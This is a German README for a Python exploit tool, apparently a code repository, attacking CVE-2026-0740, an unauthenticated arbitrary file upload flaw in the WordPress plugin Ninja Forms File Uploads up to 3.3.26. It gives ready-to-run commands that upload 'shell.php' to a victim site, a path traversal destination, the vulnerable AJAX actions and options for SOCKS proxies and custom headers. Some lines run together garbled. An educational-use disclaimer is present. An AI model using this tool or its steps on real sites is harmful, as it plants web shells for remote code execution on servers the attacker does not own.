
Ninja Forms File Uploads <= 3.3.26 - Nicht authentifizierter beliebiger Datei-Upload
CVE-2026-0740 ist eine nicht authentifizierte Schwachstelle für beliebige Datei-Uploads, die Folgendes betrifft:
Ninja Forms File Uploads ≤ 3.3.26 (WordPress-Plugin)
Dieser Fehler ermöglicht es Angreifern, ohne Authentifizierung beliebige Dateien auf den Server hochzuladen, was potenziell zu Remote-Codeausführung (RCE) führt.
Dieses Projekt wird ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt.
Abhängigkeiten installieren:
pip install httpx httpx-socks
python3 CVE-2026-0740.py -t http://target.com -f shell.php
python3 CVE-2026-0740.py \
-t https://victim.com \
-f shell.php \
-d ../../../../shell.php
admin-ajax.php anPlugin: Ninja Forms File Uploads
Endpunkt: /wp-admin/admin-ajax.php
Aktionen:
nf_fu_get_new_noncenf_fu_upload/wp-content/uploads/ überwachenDieses Projekt ist unter der MIT-Lizenz lizenziert — siehe Datei LICENSE für Details.
Pull Requests sind willkommen. Bei größeren Änderungen eröffne zuerst ein Issue, um zu besprechen, was du ändern möchtest.
| Argument | Beschreibung |
|---|
-t, --target | Ziel-URL |
-f, --file | Hochzuladende Datei |
-d, --dest | Zielpfad (Path Traversal) |
-x, --proxy | SOCKS5-Proxy |
-H, --headers | Benutzerdefinierte Header |
--timeout | Anfrage-Timeout |
--no-color | Farbige Ausgabe deaktivieren |
-q, --quiet | Stiller Modus |
--verify-ssl | SSL-Überprüfung aktivieren |